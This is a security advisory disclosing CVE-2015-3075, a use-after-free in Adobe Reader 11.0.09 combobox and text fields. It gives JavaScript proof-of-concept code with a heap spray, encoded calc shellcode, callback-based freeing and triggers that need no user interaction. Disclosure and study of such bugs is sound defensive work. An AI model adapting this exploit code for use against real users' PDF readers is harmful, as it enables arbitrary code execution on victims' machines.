SSD Advisory – Adobe Reader Combobox Code Execution

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
More powerful than other PDF software, Adobe Acrobat Reader DC is the free, trusted standard for viewing, printing, and annotating PDFs. And now, it’s connected to Adobe Document Cloud — so it’s easier than ever to work with PDFs on computers and mobile devices.
Vulnerability Details
A vulnerability in the way Adobe Reader handles comboxes allows a malicious user to send a specially crafted PDF file that once opened, and its presented combobox is accessed a code execution vulnerability can be triggered.

The following Javascript when placed inside a PDF file can be used to trigger an exploitable crash that in turn can be used to execute arbitrary code due to a use-after-free.

var memory;
var nop = unescape("%u0c0c%u0c0c");
//calc shellcode
var shellcode = unescape("%u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u5631%u030e%u0e56%u0883%uf3fe%u68ea%u7a17%u9014%u1de8%u759c %u0fd9%ufefa%u8048%u5288%u6b61%u46dc%u19f2%u69c9%u94b3%u442f%u1944%u0af0%u3b86%u508c%u9bdb%u9bad%udd2e%uc1ea%u8fc1%u8ea3%u2070%ud2c7 %u4148%u5907%u39f0%u9d22%uf385%ucd2d%u8f36%uf566%ud73d%u0456%u0b91%u4faa%uf89e%u4e58%u3176%u61a0%u9eb6%u4e9f%ude3b%u68d8%u95a4%u8b12 %uae59%uf6e0%u3b85%u50f5%u9b4d%u61dd%u7a82%u6d95%u086f%u71f1%udd6e%u8d89%ue0fb%u045d%uc6bf%u4d79%u661b%u2bdb%u97ca%u933b%u3db3%u3137 %u44a7%u5f1a%uc436%u2620%ud638%u082a%ue751%uc7a1%uf826%uac63%u1ac9%ud8a6%u8361%u6123%u34ec%ua59e%ub709%u552b%ua7ee%u5059%u6faa%u28b1 %u05a3%u9fb5%u0fc4%u7ed6%ud357%ue537%u76df%u4148");
while(nop.length < = 0x5000/2) {
nop=nop.substring(0,0x5000/2 - shellcode.length);
memory=new Array();
for(i=0; i < 0xff0; i++)
 memory[i]=nop + shellcode;
var data;
var objArray = new Array(50);
function meFree() {
 this.removeField("testField"); <-- This is where the vulnerability is triggered
 //fill freed object
 for (var i=0; i<150; i++)
  objArray[i] = data += unescape("%u0c0c%u0c0c");
var c = this.addField( {
 cName: "testField",
 cFieldType: "combobox",
 nPageNum: 0,
 oCoords:  [30, 230, 400, 700] } ); <--- Add a combobox element to page dynamically
c.setAction("Keystroke", "meFree()"); <-- Capture the Keystroke event of the combobox and use it to free ourselves

The use after free is triggered when the Combobox detects a keystroke by the user and either ChoiceA/ChoiceB is selected in the dropdown.
The keystroke event leads to a 0x60 sized object being freed and then reused again by code the follows up after it. The EIP control can be achieved by replacing the deleted object with a custom object that we created instead of the freed object.
It is difficult to know what object is being freed or the function that frees it, as Adobe Reader does not have public symbols.
The meFree function will fire when you set some items in the comboBox field, and by removing the field in that callback function, once it returns from executing the ‘action’, i.e. the keystroke event, it crashes since the object it was working on, does no longer exist.
The the provided PoC will execute calc.exe on systems on which both DEP and the adobe reader sandbox are disabled manually – which isn’t the default settings. It will trigger an Access Violation on DEP enabled systems on executing 0x0c0c0c0c.
The vulnerability can also be triggered from a text field which can be added as:

var c = this.addField({
 cName: "testField",
 cFieldType: "text",
 nPageNum: 0, oCoords: [20, 530, 330, 620] });
c.value = "this is a test";
c.setAction("Keystroke", "meFree()");

In this case, the bug is triggered when a user types or modifies text in the text field.
Though it would appear that only with user interaction can this vulnerability get triggered, by doing:
c.currentValueIndices = 1; //on the Combobox after adding the callback
Or calling
c.value = “aBc”; // On the Textfield after adding the callback
It is also possible to trigger the vulnerability automatically by calling setItems after adding the callback.
For example:

function meFree() {
var c = this.addField({
 cName: "testField",
 cFieldType: "combobox",
 nPageNum: 0,
 oCoords: [20, 510, 330, 670] });
c.setAction("Keystroke", "meFree()");
c.setItems(["ChoiceA", "ChoiceB"]);

Vulnerable Version
Adobe Reader version 11.0.09
Vendor Response
The vulnerability was sent to Adobe Acrobat and a patch released on May 9th 2015 has addressed this vulnerability.
A CVE entry, CVE-2015-3075, has been assigned to this vulnerability.

Interested in Remote Code Execution? You may be interested in these:

Looking to submit a Remote Code Execution vulnerability?

Talk to us!